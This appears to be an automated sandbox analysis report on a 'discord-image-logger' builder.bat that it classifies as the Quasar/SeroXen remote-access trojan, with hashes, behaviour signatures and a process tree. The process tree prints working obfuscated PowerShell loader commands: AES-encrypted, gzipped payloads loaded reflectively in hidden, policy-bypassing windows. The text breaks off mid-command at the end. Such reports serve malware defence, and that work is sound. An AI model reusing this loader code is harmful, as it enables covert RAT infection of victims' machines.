Overview

overview

10

Static

static

10

discord-im...er.bat

windows7-x64

10

discord-im...er.bat

windows10-2004-x64

10

discord-im...bug.py

windows7-x64

3

discord-im...bug.py

windows10-2004-x64

3

discord-im...ers.py

windows7-x64

3

discord-im...ers.py

windows10-2004-x64

3

discord-im...ken.py

windows7-x64

3

discord-im...ken.py

windows10-2004-x64

3

discord-im...ion.py

windows7-x64

3

discord-im...ion.py

windows10-2004-x64

3

discord-im...tup.py

windows7-x64

3

discord-im...tup.py

windows10-2004-x64

3

discord-im...nfo.py

windows7-x64

3

discord-im...nfo.py

windows10-2004-x64

3

discord-im...fig.py

windows7-x64

3

discord-im...fig.py

windows10-2004-x64

3

discord-im...ain.py

windows7-x64

3

discord-im...ain.py

windows10-2004-x64

3

Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
  • submitted
    19/03/2025, 22:07

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    discord-image-logger-main/builder.bat

  • Size

    14.9MB

  • MD5

    70a53c5ec35eefae927a0c413a89937a

  • SHA1

    1bc9a22903968bfc05b87c1082a5c4242802d4dd

  • SHA256

    a7aa6fa77e4931544a6966ef435400c52a79af300a548aca4e9c67f72218ac2d

  • SHA512

    c712f2b98b0eb8c4808e4abcee0cc6100fc3e7d445f40208da0429b754148f190083ce247f183bb112083c15b06f466cbe573fe01f47de3d7958d8624e8d9aae

  • SSDEEP

    49152:QYwuS617ST7nN2d57VTqUTm0AmK0jEHD5FQ/9gsyuEgPXiGncZwPnzLO1WtJHFi7:S

Score
10/10
quasarseroxendefense_evasiondiscoveryspywaretrojan

Malware Config

Extracted

Family

quasar

Attributes
  • reconnect_delay

    3000

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

    trojanspywarequasar
  • Quasar family
    quasar
  • Quasar payload 1 IoCs
  • Seroxen family
    seroxen
  • Seroxen, Ser0xen

    Seroxen or SeroXen aka Ser0Xen is a trojan fist disovered in late 2022.

    trojanseroxen
  • Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Deletes itself 1 IoCs
  • Executes dropped EXE 3 IoCs
  • Hide Artifacts: Hidden Window 1 TTPs 2 IoCs

    Windows that would typically be displayed when an application carries out an operation can be hidden.

    defense_evasion
  • Drops file in System32 directory 12 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • Kills process with taskkill 1 IoCs
    defense_evasion
  • Modifies data under HKEY_USERS 14 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 58 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of UnmapMainImage 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence
  • Views/modifies file attributes 1 TTPs 1 IoCs
    defense_evasion

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:612
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:336
      • C:\Windows\System32\dllhost.exe
        C:\Windows\System32\dllhost.exe /Processid:{94d05725-3899-46ae-b68d-fdb895f5138c}
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3164
      • C:\Windows\System32\dllhost.exe
        C:\Windows\System32\dllhost.exe /Processid:{1a0071ef-8a79-4095-ac2e-eacdbdc11058}
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1332
      • C:\Windows\System32\dllhost.exe
        C:\Windows\System32\dllhost.exe /Processid:{4d5c07b1-87bd-44c7-9f97-cb7e6304868b}
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4128
      • C:\Windows\System32\dllhost.exe
        C:\Windows\System32\dllhost.exe /Processid:{c0343420-dc8f-4bd8-be63-95eb49e374cd}
        2⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:3152
      • C:\Windows\System32\dllhost.exe
        C:\Windows\System32\dllhost.exe /Processid:{ea85b9ad-3a1f-42b6-87c7-5dc41bbc66db}
        2⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2672
    • C:\Windows\system32\lsass.exe
      C:\Windows\system32\lsass.exe
      1⤵
        PID:672
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
        1⤵
          PID:952
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
          1⤵
            PID:740
          • C:\Windows\System32\svchost.exe
            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
            1⤵
              PID:920
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
              1⤵
                PID:1056
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                1⤵
                  PID:1076
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                  1⤵
                    PID:1172
                    • C:\Windows\system32\taskhostw.exe
                      taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                      2⤵
                        PID:668
                    • C:\Windows\System32\svchost.exe
                      C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                      1⤵
                        PID:1232
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                        1⤵
                          PID:1296
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                          1⤵
                            PID:1380
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                            1⤵
                              PID:1392
                            • C:\Windows\System32\svchost.exe
                              C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                              1⤵
                                PID:1408
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                                1⤵
                                  PID:1448
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                  1⤵
                                    PID:1516
                                  • C:\Windows\system32\svchost.exe
                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                    1⤵
                                      PID:1548
                                      • C:\Windows\system32\sihost.exe
                                        sihost.exe
                                        2⤵
                                          PID:2968
                                      • C:\Windows\system32\svchost.exe
                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                        1⤵
                                          PID:1564
                                        • C:\Windows\System32\svchost.exe
                                          C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                          1⤵
                                            PID:1648
                                          • C:\Windows\System32\svchost.exe
                                            C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                            1⤵
                                              PID:1708
                                            • C:\Windows\System32\svchost.exe
                                              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                              1⤵
                                                PID:1804
                                              • C:\Windows\System32\svchost.exe
                                                C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                                1⤵
                                                  PID:1844
                                                • C:\Windows\system32\svchost.exe
                                                  C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                  1⤵
                                                    PID:1864
                                                  • C:\Windows\System32\svchost.exe
                                                    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                    1⤵
                                                      PID:1876
                                                    • C:\Windows\System32\svchost.exe
                                                      C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                      1⤵
                                                        PID:1960
                                                      • C:\Windows\system32\svchost.exe
                                                        C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                        1⤵
                                                          PID:1992
                                                        • C:\Windows\System32\spoolsv.exe
                                                          C:\Windows\System32\spoolsv.exe
                                                          1⤵
                                                            PID:1464
                                                          • C:\Windows\System32\svchost.exe
                                                            C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                            1⤵
                                                              PID:2068
                                                            • C:\Windows\System32\svchost.exe
                                                              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                              1⤵
                                                                PID:2264
                                                              • C:\Windows\system32\svchost.exe
                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                                1⤵
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:2332
                                                              • C:\Windows\system32\svchost.exe
                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                1⤵
                                                                  PID:2356
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                  1⤵
                                                                    PID:2368
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                    1⤵
                                                                    • Drops file in System32 directory
                                                                    PID:2388
                                                                  • C:\Windows\sysmon.exe
                                                                    C:\Windows\sysmon.exe
                                                                    1⤵
                                                                      PID:2480
                                                                    • C:\Windows\System32\svchost.exe
                                                                      C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                      1⤵
                                                                        PID:2488
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                        1⤵
                                                                          PID:2504
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                          1⤵
                                                                            PID:2552
                                                                          • C:\Windows\system32\svchost.exe
                                                                            C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                            1⤵
                                                                              PID:3016
                                                                            • C:\Windows\system32\wbem\unsecapp.exe
                                                                              C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                              1⤵
                                                                                PID:1072
                                                                              • C:\Windows\system32\svchost.exe
                                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                                1⤵
                                                                                  PID:512
                                                                                • C:\Windows\system32\svchost.exe
                                                                                  C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                  1⤵
                                                                                    PID:3348
                                                                                  • C:\Windows\Explorer.EXE
                                                                                    C:\Windows\Explorer.EXE
                                                                                    1⤵
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    • Suspicious use of UnmapMainImage
                                                                                    PID:3404
                                                                                    • C:\Windows\system32\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\discord-image-logger-main\builder.bat"
                                                                                      2⤵
                                                                                      • Drops file in Windows directory
                                                                                      • Suspicious use of WriteProcessMemory
                                                                                      PID:3184
                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        3⤵
                                                                                          PID:4716
                                                                                        • C:\Windows\system32\net.exe
                                                                                          net session
                                                                                          3⤵
                                                                                          • Suspicious use of WriteProcessMemory
                                                                                          PID:3128
                                                                                          • C:\Windows\system32\net1.exe
                                                                                            C:\Windows\system32\net1 session
                                                                                            4⤵
                                                                                              PID:4268
                                                                                          • C:\Users\Admin\AppData\Local\Temp\discord-image-logger-main\builder.bat.exe
                                                                                            "builder.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function VsYFF($UqIEP){ $cckBt=[System.Security.Cryptography.Aes]::Create(); $cckBt.Mode=[System.Security.Cryptography.CipherMode]::CBC; $cckBt.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $cckBt.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('UEGY9MIPrGN+l8HMK+EOWWOHd3i8s5ddQy0gjFJszf0='); $cckBt.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hIU6Lrw5kmXrlY9ZdCP5WQ=='); $twFeA=$cckBt.CreateDecryptor(); $return_var=$twFeA.TransformFinalBlock($UqIEP, 0, $UqIEP.Length); $twFeA.Dispose(); $cckBt.Dispose(); $return_var;}function onOdy($UqIEP){ $DcweI=New-Object System.IO.MemoryStream(,$UqIEP); $sUfkw=New-Object System.IO.MemoryStream; $rNOwy=New-Object System.IO.Compression.GZipStream($DcweI, [IO.Compression.CompressionMode]::Decompress); $rNOwy.CopyTo($sUfkw); $rNOwy.Dispose(); $DcweI.Dispose(); $sUfkw.Dispose(); $sUfkw.ToArray();}function spGXl($UqIEP,$ZvarV){ $UbgZg=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$UqIEP); $oUCsb=$UbgZg.EntryPoint; $oUCsb.Invoke($null, $ZvarV);}$WAkYi=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\discord-image-logger-main\builder.bat').Split([Environment]::NewLine);foreach ($kjXpr in $WAkYi) { if ($kjXpr.StartsWith(':: ')) { $vbeRz=$kjXpr.Substring(4); break; }}$IzdcO=[string[]]$vbeRz.Split('\');$clAux=onOdy (VsYFF ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($IzdcO[0])));$WNxAq=onOdy (VsYFF ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($IzdcO[1])));spGXl $WNxAq (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));spGXl $clAux (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));
                                                                                            3⤵
                                                                                            • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                            • Checks computer location settings
                                                                                            • Deletes itself
                                                                                            • Executes dropped EXE
                                                                                            • Drops file in System32 directory
                                                                                            • Suspicious use of SetThreadContext
                                                                                            • Drops file in Windows directory
                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            • Suspicious use of WriteProcessMemory
                                                                                            PID:652
                                                                                            • C:\Windows\$sxr-powershell.exe
                                                                                              "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function OONaJ($CAUyg){ $UaEuB=[System.Security.Cryptography.Aes]::Create(); $UaEuB.Mode=[System.Security.Cryptography.CipherMode]::CBC; $UaEuB.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $UaEuB.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tpmLSLfO82GY8X9Uk5Rdcs14/nfUtYA6Sn+ueOLgpTk='); $UaEuB.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MtyvC8ZzBF30QNLH3U5QaQ=='); $hVJMW=$UaEuB.('rotpyrceDetaerC'[-1..-15] -join '')(); $dSUQC=$hVJMW.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CAUyg, 0, $CAUyg.Length); $hVJMW.Dispose(); $UaEuB.Dispose(); $dSUQC;}function XNrXq($CAUyg){ $JuLib=New-Object System.IO.MemoryStream(,$CAUyg); $yWMQI=New-Object System.IO.MemoryStream; $ovPeB=New-Object System.IO.Compression.GZipStream($JuLib, [IO.Compression.CompressionMode]::Decompress); $ovPeB.CopyTo($yWMQI); $ovPeB.Dispose(); $JuLib.Dispose(); $yWMQI.Dispose(); $yWMQI.ToArray();}function LWfQc($CAUyg,$FEAph){ $ABDeF=[System.Reflection.Assembly]::Load([byte[]]$CAUyg); $WyGRR=$ABDeF.EntryPoint; $WyGRR.Invoke($null, $FEAph);}$UaEuB1 = New-Object System.Security.Cryptography.AesManaged;$UaEuB1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$UaEuB1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$UaEuB1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tpmLSLfO82GY8X9Uk5Rdcs14/nfUtYA6Sn+ueOLgpTk=');$UaEuB1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MtyvC8ZzBF30QNLH3U5QaQ==');$PwPCN = $UaEuB1.('rotpyrceDetaerC'[-1..-15] -join '')();$GCidc = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XSkKpx7QoQiF0BsaqEtF9g==');$GCidc = $PwPCN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GCidc, 0, $GCidc.Length);$GCidc = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GCidc);$hbuWR = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('b2Ib4CeUG3V15LN/pc/Lrm4LCmpRZWn3AV06VFawX7o=');$hbuWR = $PwPCN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hbuWR, 0, $hbuWR.Length);$hbuWR = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($hbuWR);$ZzVHZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XLxMpEm8cOctcAJWUeWXmQ==');$ZzVHZ = $PwPCN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ZzVHZ, 0, $ZzVHZ.Length);$ZzVHZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ZzVHZ);$zmDYn = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x//PQ4u8mfYZiPHe2OGfrd00QBKiDvcEzPaDrYozv8uYedand6uL0wzlN+5O+AFhCoQAKBv651U3V0221QDxAvpv3KCyoJoReYXVHf6P7M/KyX5+2eOQjYEjFwTGbUjMLAybGiiaRNU03vlqAT7agKum7o1H6WfH+N764uOSYGL3HIdf7WKB0TMZlcqkVcZ4EbttcZsQjZV1vkCPbJt39bdJJTOLlHC5/EHgOLRlT+W3G+02exnNVSpXP20jdKzqezuTgmjWtvyJkL9/lFJG3FHUGehTiuT3ar2yFCKi4/OkHCw1z1DGbDJvEtWfauUaRRol3S/UgNocMBrJOXX+Aw0PMubGj40DP02/Mw4JY8R/V/7YpQkEP43UqopfbI11ciWaaIn/nKzAOZ+bXBTY5L+DxT8LfXRiRGkrI1/LwcQ=');$zmDYn = $PwPCN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($zmDYn, 0, $zmDYn.Length);$zmDYn = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($zmDYn);$nTpTd = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NW2EL3qe/ZOARS0s/ML1EA==');$nTpTd = $PwPCN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($nTpTd, 0, $nTpTd.Length);$nTpTd = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($nTpTd);$snbQC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2AgSI40erquiJx027xjhrA==');$snbQC = $PwPCN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($snbQC, 0, $snbQC.Length);$snbQC = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($snbQC);$qxpKv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2iK7UtzUwrolEWaIcQUhnQ==');$qxpKv = $PwPCN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($qxpKv, 0, $qxpKv.Length);$qxpKv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($qxpKv);$AJQNv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KrSM+woEOB3Vezss7LVo2Q==');$AJQNv = $PwPCN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($AJQNv, 0, $AJQNv.Length);$AJQNv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($AJQNv);$AfXGh = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7Wjsjcy3SC8ri3a9Bw4QkA==');$AfXGh = $PwPCN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($AfXGh, 0, $AfXGh.Length);$AfXGh = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($AfXGh);$GCidc0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zah5Ks6KFV7nxV/Lj1cbNA==');$GCidc0 = $PwPCN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GCidc0, 0, $GCidc0.Length);$GCidc0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GCidc0);$GCidc1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3d2GFulV4IACfF1Solw09Q==');$GCidc1 = $PwPCN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GCidc1, 0, $GCidc1.Length);$GCidc1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GCidc1);$GCidc2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dmoVWHHHBRJhscv9vH7d+Q==');$GCidc2 = $PwPCN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GCidc2, 0, $GCidc2.Length);$GCidc2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GCidc2);$GCidc3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Yy1MO8gEwf8dMKODGTzF5g==');$GCidc3 = $PwPCN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GCidc3, 0, $GCidc3.Length);$GCidc3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GCidc3);$PwPCN.Dispose();$UaEuB1.Dispose();if (@(get-process -ea silentlycontinue $GCidc3).count -gt 1) {exit};$UtsnC = [Microsoft.Win32.Registry]::$AJQNv.$qxpKv($GCidc).$snbQC($hbuWR);$VFMJc=[string[]]$UtsnC.Split('\');$rhtBQ=XNrXq(OONaJ([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($VFMJc[1])));LWfQc $rhtBQ (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$NvzQg = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($VFMJc[0]);$UaEuB = New-Object System.Security.Cryptography.AesManaged;$UaEuB.Mode = [System.Security.Cryptography.CipherMode]::CBC;$UaEuB.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$UaEuB.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tpmLSLfO82GY8X9Uk5Rdcs14/nfUtYA6Sn+ueOLgpTk=');$UaEuB.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MtyvC8ZzBF30QNLH3U5QaQ==');$hVJMW = $UaEuB.('rotpyrceDetaerC'[-1..-15] -join '')();$NvzQg = $hVJMW.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NvzQg, 0, $NvzQg.Length);$hVJMW.Dispose();$UaEuB.Dispose();$JuLib = New-Object System.IO.MemoryStream(, $NvzQg);$yWMQI = New-Object System.IO.MemoryStream;$ovPeB = New-Object System.IO.Compression.GZipStream($JuLib, [IO.Compression.CompressionMode]::$GCidc1);$ovPeB.$AfXGh($yWMQI);$ovPeB.Dispose();$JuLib.Dispose();$yWMQI.Dispose();$NvzQg = $yWMQI.ToArray();$fcYPL = $zmDYn | IEX;$ABDeF = $fcYPL::$GCidc2($NvzQg);$WyGRR = $ABDeF.EntryPoint;$WyGRR.$GCidc0($null, (, [string[]] ($ZzVHZ)))
                                                                                              4⤵
                                                                                              • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                              • Executes dropped EXE
                                                                                              • Hide Artifacts: Hidden Window
                                                                                              • Drops file in System32 directory
                                                                                              • Suspicious use of SetThreadContext
                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                              • Suspicious use of WriteProcessMemory
                                                                                              PID:64
                                                                                              • C:\Windows\$sxr-powershell.exe
                                                                                                "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(64).WaitForExit();[System.Threading.Thread]::Sleep(5000); function OONaJ($CAUyg){ $UaEuB=[System.Security.Cryptography.Aes]::Create(); $UaEuB.Mode=[System.Security.Cryptography.CipherMode]::CBC; $UaEuB.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $UaEuB.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tpmLSLfO82GY8X9Uk5Rdcs14/nfUtYA6Sn+ueOLgpTk='); $UaEuB.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MtyvC8ZzBF30QNLH3U5QaQ=='); $hVJMW=$UaEuB.('rotpyrceDetaerC'[-1..-15] -join '')(); $dSUQC=$hVJMW.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CAUyg, 0, $CAUyg.Length); $hVJMW.Dispose(); $UaEuB.Dispose(); $dSUQC;}function XNrXq($CAUyg){ $JuLib=New-Object System.IO.MemoryStream(,$CAUyg); $yWMQI=New-Object System.IO.MemoryStream; $ovPeB=New-Object System.IO.Compression.GZipStream($JuLib, [IO.Compression.CompressionMode]::Decompress); $ovPeB.CopyTo($yWMQI); $ovPeB.Dispose(); $JuLib.Dispose(); $yWMQI.Dispose(); $yWMQI.ToArray();}function LWfQc($CAUyg,$FEAph){ $ABDeF=[System.Reflection.Assembly]::Load([byte[]]$CAUyg); $WyGRR=$ABDeF.EntryPoint; $WyGRR.Invoke($null, $FEAph);}$UaEuB1 = New-Object System.Security.Cryptography.AesManaged;$UaEuB1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$UaEuB1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$UaEuB1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tpmLSLfO82GY8X9Uk5Rdcs14/nfUtYA6Sn+ueOLgpTk=');$UaEuB1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MtyvC8ZzBF30QNLH3U5QaQ==');$PwPCN = $UaEuB1.('rotpyrceDetaerC'[-1..-15] -join '')();$GCidc = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XSkKpx7QoQiF0BsaqEtF9g==');$GCidc = $PwPCN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GCidc, 0, $GCidc.Length);$GCidc = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GCidc);$hbuWR = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('b2Ib4CeUG3V15LN/pc/Lrm4LCmpRZWn3AV06VFawX7o=');$hbuWR = $PwPCN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hbuWR, 0, $hbuWR.Length);$hbuWR = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($hbuWR);$ZzVHZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XLxMpEm8cOctcAJWUeWXmQ==');$ZzVHZ = $PwPCN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ZzVHZ, 0, $ZzVHZ.Length);$ZzVHZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ZzVHZ);$zmDYn = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join 